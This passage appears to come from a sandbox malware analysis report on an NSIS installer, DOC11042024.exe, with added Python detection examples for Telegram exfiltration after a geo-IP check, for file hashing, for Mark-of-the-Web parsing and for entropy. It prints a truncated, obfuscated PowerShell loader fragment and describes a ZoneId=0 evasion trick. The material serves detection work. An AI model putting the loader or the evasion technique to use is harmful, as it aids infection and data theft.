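def score_processes(events):
    """Score each process image by the IOC combinations it exhibits.

    Returns {image: {"score": int, "reasons": [str, ...]}}.
    """
    by_image = defaultdict(list)
    for ev in events:
        by_image[ev["image"]].append(ev)

    results = {}
    for image, evs in by_image.items():
        score, reasons = 0, []
        geo_idx = [i for i, e in enumerate(evs) if is_geoip_check(e)]
        tg_idx = [i for i, e in enumerate(evs) if is_telegram(e)]
        if geo_idx:
            score += 2
            reasons.append("queried checkip.dyndns.com (country check by IP)")
        if tg_idx:
            score += 2
            reasons.append("reached the Telegram API")
        # The order seen in the report: locate the victim first, then exfiltrate
        # over Telegram. Both from one non-messenger process is the strong signal.
        if geo_idx and tg_idx and geo_idx[0] < tg_idx[-1]:
            score += 4
            reasons.append("geo-IP check followed by Telegram from the same process")
        if any(e["ja3"].lower() in WEAK_JA3 for e in evs):
            score += 1
            reasons.append("JA3 shared with many unrelated families (weak)")
        results[image] = {"score": score, "reasons": reasons}
    return results


def alerts(events, threshold=ALERT_THRESHOLD):
    """Images whose score reaches the threshold, highest first."""
    scored = score_processes(events)
    hits = [(v["score"], img) for img, v in scored.items() if v["score"] >= threshold]
    return [img for _, img in sorted(hits, reverse=True)]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for img, v in score_processes(evs).items():
        print(f'{v["score"]:2d}  {img}')
        for r in v["reasons"]:
            print(f"      - {r}")
    print("alerts:", alerts(evs))
```

On the constructed events only DOC11042024.exe crosses the threshold; the legitimate Telegram client reaching the same endpoint scores 3 and a process with only the shared JA3 scores 1. The Telegram addresses and the Oracle-hosted addresses behind checkip.dyndns.com (the same IPs recur in the ORACLE-BMC-31898US rows) also carry legitimate traffic, which is why the correlator scores the combination and the originating process rather than alerting on any single destination or on the ASN.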
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):14744
                                                                            Entropy (8bit):4.992175361088568
                                                                            Encrypted:false
                                                                            SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                            MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                            SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                            SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                            SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
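The four 60-byte files above are the probe PowerShell itself writes to test for AppLocker lockdown mode, which is why the report rates them "very likely benign" and why their hashes recur across unrelated sandbox runs. Added example, not part of the Joe Sandbox report: recomputing the size, the 8-bit Shannon entropy and the hashes from the previewed content so that a dropped-file record can be checked against its bytes. The content is the preview line with a trailing space, an assumption made here because it is what yields the listed 60 bytes; the expected values are copied from the entries above.

```python
"""Recompute the fingerprints the report lists for the AppLocker probe files.

Added example, not part of the Joe Sandbox report. The content reproduces the
report's preview line; the trailing space is an assumption that makes the size
match the listed 60 bytes. Expected values are copied from the report entries.
"""
import hashlib
import math
from collections import Counter

# Content of the PowerShell AppLocker probe file (assumed trailing space).
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report's dropped-file entries.
EXPECTED = {
    "size": 60,
    "entropy": 4.038920595031593,
    "md5": "d17fe0a3f47be24a6453e9ef58c94641",
    "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
    "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7",
}


def shannon_entropy(data):
    """Entropy in bits per byte, the 'Entropy (8bit)' figure in the report."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def fingerprint(data):
    """Size, entropy and hashes of a byte string, keyed like the report fields."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def compare(data, expected, tol=1e-6):
    """Return {field: bool} saying which expected values the content reproduces."""
    got = fingerprint(data)
    out = {}
    for key, want in expected.items():
        have = got[key]
        if key == "entropy":
            out[key] = abs(have - want) < tol
        elif isinstance(want, str):
            out[key] = have.lower() == want.lower()
        else:
            out[key] = have == want
    return out


if __name__ == "__main__":
    fp = fingerprint(APPLOCKER_PROBE)
    result = compare(APPLOCKER_PROBE, EXPECTED)
    for key in EXPECTED:
        mark = "ok" if result[key] else "MISMATCH"
        print(f"{key:8s} {str(fp[key]):64s} {mark}")
```

A record whose size and entropy are reproduced but whose hashes are not would point at the preview being an incomplete rendering of the bytes rather than at a different file; a file of the same size with entropy well above this value would not be the plain-text probe at all.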
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):964090
                                                                            Entropy (8bit):4.764322952518005
                                                                            Encrypted:false
                                                                            SSDEEP:6144:68XTkg5Sb127W/6CBY7g+uwGoPkCfUQtUvr38uJVOAiKY83PqZaPL26LZGSaCjwT:SgsJ/z28+u5HC8jr3v+aDi6lJAYgvL/N
                                                                            MD5:05C2A48278C52703FFA604232A84CC38
                                                                            SHA1:026C93046B1827D117F5E986F75839BEBC407F9A
                                                                            SHA-256:2EFD0227F895EAC9347AC5F9CC58B3835BEE439C2DED4C91EFB73A9E84C255F5
                                                                            SHA-512:654F6966F9853931ED4B89CF1E0FC98039FF46960B9F942E617435592E18067D0B4EAFC0EC38348563DA7DA0105BBB7C56731038371A1E81BF8AA7F920B3CC29
                                                                            Malicious:false
                                                                            Preview:bz......,...............$*.......I......Ly.......z..............................................k...................................M.......................................................................................................................................................G...p...............j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):46
                                                                            Entropy (8bit):3.836047762460485
                                                                            Encrypted:false
                                                                            SSDEEP:3:CIK5gN0leKbQA5:LKRe7A5
                                                                            MD5:1CF88EB768688A65B89C8422C4983163
                                                                            SHA1:CEC4C169379A3E69CC44E8711753B5359D2CC130
                                                                            SHA-256:2BF3BC0DA143B165F824BC0A42BEC0903191F04CB6EDD5DF92C441D034717957
                                                                            SHA-512:3F34A000D3001749B58EF64D1C9FABBFCF43B7019FC588D9E123B0A324560D74AF5097F37C98C2CF315CB15C3E4CE47FB79CF4B8AF5AC45AD2BFB0849AC069C2
                                                                            Malicious:false
                                                                            Preview:[stomodaeums]..untransientness=Konditionerne..
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):49665
                                                                            Entropy (8bit):2.307083160235672
                                                                            Encrypted:false
                                                                            SSDEEP:768:zwmvIL4MR38y/hyuUS7CGDpwwqWtHVJCtHnKxzYbv:zvMRbEZGXOKG
                                                                            MD5:3AFC04CC9C861BC8BC32CD1F35AC5B8A
                                                                            SHA1:7E3BB9EB009650D5580374F3371CCAB0DC332CC5
                                                                            SHA-256:FFA9F7F9E9E9F3F6F52A318FBB1D7AC10A62A144E0A0EA9029681B3D2BC8AC2C
                                                                            SHA-512:086E7DD4D610AAE4B3042F90FCE3E16EFF7A6FA09FD7A161803BC536824B21D90AD160F8E861456C047838FC50CB81AA505B3671559E61D10817BFD7C6CCD758
                                                                            Malicious:false
                                                                            Preview:.........f....._.............;................................................................b...................`.p$.................................=.......<...(..............(..............k...X..................T........................s..(.........N.......X.............................`..............n................O......... ............Y..................................C.................F.............)R.....m...........F........<.%.......h.................3&...................................P.......i...............ZP....U.................6............l.....H.U.R.....................................T...........................Y...R...b.........oI.........................................s..M...................R..\..L.........+.......................................b.......................c..........................v.......].........a...0.......7..............Q........................................Y.X...a.............?......................0C........g............5..........
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):314290
                                                                            Entropy (8bit):2.3014083432260093
                                                                            Encrypted:false
                                                                            SSDEEP:1536:9nNjZMWsSaCpU9leJUsnVA71damwoZBV3TyKX50hVOBNopWlukDGzUnsTEaNjrDF:9NjZGSaCpbFzmBpyGmWlu0sQskXH/sRz
                                                                            MD5:0A673A90442585CF2385C436AA535E6F
                                                                            SHA1:211C84078F9E42B7A0196D942F70F306C786C286
                                                                            SHA-256:31D1875B0180F5E0818102C734A69F61FB818D754077644C6E9A3B740C9592B1
                                                                            SHA-512:F571D9EB8BCCBC3CA2385F8B11E868DEBEF0A10E671219F62CB2A95558609CEDF552E76E618964F17204D745BEC49529B9D0F30FB6A6150D2C9AB5552E6D706F
                                                                            Malicious:false
                                                                            Preview:?.....l................e.;.......<..(...............................@.......U../..........................................................7....,.H.....\....................;.....<.#.............0...............................R.............K.............a.........................%....F.....p.............I............3....So..f.......n............q.fD.......(................]...4............&.......................{.......................=....7.......>.......................................T..............................................&.........O....................................l....G..............................................................................................L..............................D....m..._............................(..k...w..................................$....................Uh.......$.!....A......x..........m.................T....F.........Y........=....J.....}..........U...c.'...C.......4..........................z........................#........
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):677344
                                                                            Entropy (8bit):7.701041803336108
                                                                            Encrypted:false
                                                                            SSDEEP:12288:2XJ/BQ9wbOEvCJhy5aFj0MbS9ytLF9vVSaQ5X5X8LfH8+C7uPgITpm:8/rOuCJMyJu9ytBfaM8aPgITpm
                                                                            MD5:2119B4C15A036B7E407A7483A89ECDBF
                                                                            SHA1:37C3C28BBA3F2482E92B3B0EF570C2BA6F3167A8
                                                                            SHA-256:66C79A5E56A0B28126534DED1E9DD50E2DE460FB671C49E7CF7A365568C7067B
                                                                            SHA-512:0DC2FBEC1EED5CDE2BF221C4B95A8CF232FCC922FF8B791CEF8B4E816F7BCCB1EE3C7B4510FC7AA78A74052DBD5694E1CE3ED55765BA8D1358529B9371829C0B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L......Q.................`...*.......3.......p....@..........................P...............................................t...........q...........L...............................................................p...............................text... ^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...0...............................rsrc....q.......r...~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0
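The 26-byte stream above is an NTFS Zone.Identifier alternate data stream, the Mark-of-the-Web that Windows attaches to downloaded files, and it accompanies the copy of the original sample that powershell.exe writes (same MD5/SHA-256 as the submitted file). Its value, ZoneId=0, is URLZONE_LOCAL_MACHINE, so SmartScreen and Office Protected View treat the file as local rather than as an Internet download. The parser below is an added example, not code from the report or from Joe Sandbox: the first sample stream is reconstructed from the size and preview shown above, the second is a constructed browser-style stream with a made-up example.invalid host.

```python
"""Parse and classify an NTFS Zone.Identifier stream (the Mark-of-the-Web).

Added example; not code from the report or from Joe Sandbox. SANDBOX_STREAM is
reconstructed from the entry above (26 bytes, "[ZoneTransfer]" and "ZoneId=0",
CRLF terminators); BROWSER_STREAM is a constructed comparison with a made-up host.
"""
from typing import Optional

# URLZONE_* values from urlmon.h
ZONE_NAMES = {
    0: "LocalMachine",
    1: "LocalIntranet",
    2: "TrustedSites",
    3: "Internet",
    4: "RestrictedSites",
}

SANDBOX_STREAM = b"[ZoneTransfer]\r\nZoneId=0\r\n"  # what powershell.exe wrote (26 bytes)
BROWSER_STREAM = (                                  # constructed: a typical browser download mark
    b"[ZoneTransfer]\r\n"
    b"ZoneId=3\r\n"
    b"ReferrerUrl=https://example.invalid/\r\n"
    b"HostUrl=https://example.invalid/DOC11042024.exe\r\n"
)


def parse_zone_identifier(data: bytes) -> dict:
    """Return the [ZoneTransfer] keys plus ZoneName and MotwEnforced.

    Raises ValueError when there is no numeric ZoneId in a [ZoneTransfer]
    section, so a caller never mistakes a malformed stream for "no mark".
    """
    fields = {}
    in_section = False
    for raw in data.decode("utf-8", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    try:
        zone = int(fields["ZoneId"])
    except (KeyError, ValueError):
        raise ValueError("no numeric ZoneId in a [ZoneTransfer] section") from None
    fields["ZoneId"] = zone
    fields["ZoneName"] = ZONE_NAMES.get(zone, f"Unknown({zone})")
    # SmartScreen and Office Protected View act on Internet (3) and
    # RestrictedSites (4) only; ZoneId=0 makes the file look local.
    fields["MotwEnforced"] = zone >= 3
    return fields


def read_zone_identifier(path: str) -> Optional[dict]:
    """Read the stream from disk (NTFS only); None when the file carries no mark."""
    try:
        with open(path + ":Zone.Identifier", "rb") as f:  # NTFS alternate-stream syntax
            return parse_zone_identifier(f.read())
    except FileNotFoundError:
        return None


if __name__ == "__main__":
    for name, stream in (("sandbox", SANDBOX_STREAM), ("browser", BROWSER_STREAM)):
        info = parse_zone_identifier(stream)
        print(f"{name}: ZoneId={info['ZoneId']} ({info['ZoneName']}), "
              f"MOTW enforced: {info['MotwEnforced']}")
```

On a Windows host the same stream is visible with `Get-Content -Stream Zone.Identifier <file>`; a ZoneId=0 mark written next to a freshly dropped executable is worth flagging in detection logic because it is the value a legitimate download would not carry.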
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:ASCII text, with very long lines (4199), with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):73172
                                                                            Entropy (8bit):5.200798981640251
                                                                            Encrypted:false
                                                                            SSDEEP:1536:k4JKvd5jvoXs5AVOuLKr6LZ6hA08L083/Nkc4DYqT6+aPzHita:k4YHjv2JVOAKrxKz083/NCEqT6+aPzH3
                                                                            MD5:8D96A572DD88752B194CA8CF3F1C042B
                                                                            SHA1:DA71E31E2313456E2B29757609AF4C895BD8A4CF
                                                                            SHA-256:71100EDC195FBAEEB22FC562D5E99A1C36CAD69D8BBE3D446B44B041A8BB9208
                                                                            SHA-512:8648847897D3895233D5C8C71FE911D2529917C6E3E817AAE589726B0979EC7F397C597CD8548C0F2996A70F012786FB7936B78DF70327913C3C82BE9C7D5FF2
                                                                            Malicious:true
                                                                            Preview:$Vandbreres=$ravnemrkencestries;..<#Unhumanise Titalssystemets Rigsrevisionen Slaker Renegade Familiesammenfring #>..<#Davide Unconstrainedness Sygesikringsbevisets metaling Intercolumnation Kredittimer Deemer #>..<#Linjeredigeringen Posrer rentee #>..<#Scheelite Citifies Unturgid Aotes #>..<#Gteskabstilbud Skyggelgningerne Systole Morpholoical Velrt Trachled #>..<#Dekanter Cervus Licenced #>...$biografteatres = @'. Piscic. Be ali$ gradeyLStarbaauUndereamSlido.eb N nvire BetvanrInamovaeAnafortr Slump,=Dommeda$Revolutrr bblelaCockardvSkidwaynTheatrieTapnetkmOverdrar Ludicrk WilleteSvo.lhalatramenk UnpartaDom.ticl UndigeiSektiongEllesteeThac ednSindsbe;,aveeje. VespbrfLdermapuguanabanOviformcResurfat RecommiUdstopgoIndsbnin Dds am H atstrJ Outfl oWauc twlJudais l RiegliiCoccothfBaryl by Sk,lee afp ikk(Veltilp$GaslighrUnfina at pdresvSvanhopnAmmeundeSalmonem TillgsrPregu rk semipre Be tod, Klo kk$BoffolaWTrommesiSbenstirFuraldee ephlegwOvermoiounsteelrnonsenskPo rerfi SkrmennUna,progdisc.
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):291130
                                                                            Entropy (8bit):7.683492297887796
                                                                            Encrypted:false
                                                                            SSDEEP:6144:rTkg5Sb127W/6CBY7g+uwGoPkCfUQtUvr3D:cgsJ/z28+u5HC8jr3D
                                                                            MD5:106631F3FE8B1466CF81F6034D7D5B01
                                                                            SHA1:EFBF5BD218889AA0ECDCB1D99285F68F04DA0DAE
                                                                            SHA-256:6BAC90C8E5B6BA1851F4E18C1FD305B1826B7A726D2E00D2D2ECB9D68E0070E0
                                                                            SHA-512:38A7AE0B34E536BCE3F00D988B03F04A3B06FD823B418FABED8A75E84E6DB24D7EDA712BCA31AF25E4B73C63E030CCE6A57111C871B72D0621378B8E55EF5ADF
                                                                            Malicious:false
                                                                            Preview:..}}..........S....///.................m.......n..................FF....fff...aaa...{...r..33............../.............y..........................................................4......xxx...S.................W...333.............:...........??......8............KKK........HHH........".........a......?.ZZZZ.........e.......ii............................5..333.#..mmmm......Z...............D.'.vv...qqq..........................PPPP.|......................H..........77...k............??.y.....[.....PPP.......g.O...w....ZZZ..................ttttt...........O........y......dd........................QQQ.........................................................RRR........................................ee............^...EEEEE.................VVVVVV.0...Y..........a..LL................PP.yyy........Y.......ii.f.................................vvv...........j.++.f.............NNNN.........................j......oo....N...11....w.**.........4.......................9.QQ..d........................
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:ASCII text, with very long lines (311), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):555
                                                                            Entropy (8bit):4.296685115633425
                                                                            Encrypted:false
                                                                            SSDEEP:12:ipTcM6gXrr+RfAo1YO9d0/0JaUEYi4gxMupNF6+y3Jv6quABQ7v2y:ilAuOfAjOUcJa/AdE6+mv6PABQ7vX
                                                                            MD5:05A5C3B4A770ACA6FC2F47CC40847FA5
                                                                            SHA1:59E660F036F9CC982F01179F13348B498B9E924B
                                                                            SHA-256:B12CD7400A5A2EE6E9BEF2994FD82B1650DD98C7238028E22B082C5D6AB87288
                                                                            SHA-512:3F4A3D7D098EF0E8257C78EA00E2F51D1F6FD37AD73EF31D460D3B5B07E2688E40D1921A0DBBD5B9B10D1AF6D80B823D1EA615F13A8288B5957899CAE75D5396
                                                                            Malicious:false
                                                                            Preview:leon uncereclothed kancellilaud fortrolighedernes feminists ozone mandslingernes antitragicus..udrugningens dramshop sanctions moochulka inhumanity bdelloura pernittengrynens mahmouds forsvarsvrks whilie sangsvanes undertrykkelsen portifory..uncombustible smugryg counterpaled,preprocessorerne tragtningen nonnecessity,weakhearted printertilslutning masturbationers formbling overrigorousness forfriskende expandor.alumnae aber unamplified gullyhole nabbers forlystende hviskene ndk forundringers kulturkredsenes geognostical allemontite tilstraekkelige..
                                                                            Process:C:\Users\user\Desktop\DOC11042024.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):203920
                                                                            Entropy (8bit):2.2879778729381077
                                                                            Encrypted:false
                                                                            SSDEEP:1536:+xN56/s/mfDvxSumcvrZLyhKjXAvtXUcmXEWsCn/N:+LM/s/odTvrZWwcGn/N
                                                                            MD5:2AEF25928E999FB8C6A2C1E850974F3E
                                                                            SHA1:1CE656A158733656455170146DA1660926E4A4A9
                                                                            SHA-256:936985B28A39966CD962AD8CD7DEDC0146DA1A2F19895C7F0DF638922282A3CD
                                                                            SHA-512:6A4AC11D6E3F97B2F1CCA65BE2DF6E5C5FAF97C92E31EBC6FD6FAF589D40A75E384FCFE7DBB0FAC2EA11BF950B9C0A8A956F587B1B61D4EC80EED2D33D35FE70
                                                                            Malicious:false
                                                                            Preview:.U...........8.................iZ.....>...................."................[........................................*.....!..................s......k............z......+..............\.'........}..................*.....E..................5.....@.......................=....................].....................d....................G.............t.....B.................................u..q.................f................n.r............................#......t..............................................q....;........C...........>...........<...........................J.......!...>.........................N......b.....................R....=.....X..................K..........................Z..........c..................................................................i.......28...=.$j......%.......................i......................../.................L...d.E...........................................HV......L.........d.....c...........................q...........................
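Every dropped-file entry above carries an "Entropy (8bit)" figure: the NSIS installer (7.70) and the 291 KB data blob (7.68) sit near the 8.0 ceiling, the PowerShell script (5.20) and the word list (4.30) look like text, and the three ~2.3 blobs are mostly padding. The block below is an added example, not code from the report or from Joe Sandbox: it computes the same 8-bit Shannon entropy, applies a triage banding that is this example's own heuristic, and scans a constructed carrier in windows, which shows where a high-entropy payload sits even when the whole-file figure is unremarkable.

```python
"""8-bit Shannon entropy, the quantity behind the "Entropy (8bit)" field.

Added example, not code from Joe Sandbox or the report. The carrier it scans is
constructed here (zero padding around a seeded pseudo-random block), and the
band thresholds in entropy_band() are a heuristic chosen for this example.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 when every byte is identical, 8.0 when all 256 values are equally frequent."""
    n = len(data)
    counts = Counter(data)
    if n == 0 or len(counts) == 1:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def entropy_band(h: float) -> str:
    """Rough triage label (thresholds are an assumption of this example).

    Against the report's figures: the installer (7.70) and the 291 KB blob (7.68)
    land in 'packed/encrypted', .text (6.41) in 'code/mixed', the PowerShell
    script (5.20) and word list (4.30) in 'text', the ~2.3 blobs in 'sparse/padded'.
    """
    if h >= 7.2:
        return "packed/encrypted"
    if h >= 5.5:
        return "code/mixed"
    if h >= 3.5:
        return "text"
    return "sparse/padded"


def high_entropy_windows(data: bytes, window: int = 1024, threshold: float = 7.2):
    """(offset, entropy) for each non-overlapping window at or above the threshold.

    A single whole-file figure averages padding and payload together; windowing
    locates the embedded high-entropy region.
    """
    hits = []
    for off in range(0, len(data), window):
        h = shannon_entropy(data[off:off + window])
        if h >= threshold:
            hits.append((off, h))
    return hits


# Constructed carrier: 4 KiB of zeros, 4 KiB of seeded pseudo-random bytes
# standing in for an encrypted blob, then 2 KiB of zeros.
_rng = random.Random(1548204)  # arbitrary fixed seed (the report's analysis ID)
RANDOM_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
CARRIER = b"\x00" * 4096 + RANDOM_BLOB + b"\x00" * 2048

if __name__ == "__main__":
    whole = shannon_entropy(CARRIER)
    print(f"whole carrier: {whole:.2f} bits/byte -> {entropy_band(whole)}")
    for off, h in high_entropy_windows(CARRIER):
        print(f"  high-entropy window at 0x{off:x}: {h:.2f} bits/byte")
```

The whole-carrier figure comes out around 4 bits per byte, in the "text" band, while the window scan isolates the four 1 KiB blocks of the random region; the same split is why the 49 KB and 314 KB "data" drops above can read as low-entropy padding overall and still conceal a compact high-entropy payload.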
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.701041803336108
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:DOC11042024.exe
                                                                            File size:677'344 bytes
                                                                            MD5:2119b4c15a036b7e407a7483a89ecdbf
                                                                            SHA1:37c3c28bba3f2482e92b3b0ef570c2ba6f3167a8
                                                                            SHA256:66c79a5e56a0b28126534ded1e9dd50e2de460fb671c49e7cf7a365568c7067b
                                                                            SHA512:0dc2fbec1eed5cde2bf221c4b95a8cf232fcc922ff8b791cef8b4e816f7bccb1ee3c7b4510fc7aa78a74052dbd5694e1ce3ed55765ba8d1358529b9371829c0b
                                                                            SSDEEP:12288:2XJ/BQ9wbOEvCJhy5aFj0MbS9ytLF9vVSaQ5X5X8LfH8+C7uPgITpm:8/rOuCJMyJu9ytBfaM8aPgITpm
                                                                            TLSH:53E40252A45450DBED7A57B16C3B4C5816A32E7EEDF0A40E669AB63113B33E3005BE0F
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L......Q.................`...*.......3.......p....@
                                                                            Icon Hash:4f19194767674101
                                                                            Entrypoint:0x40331c
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
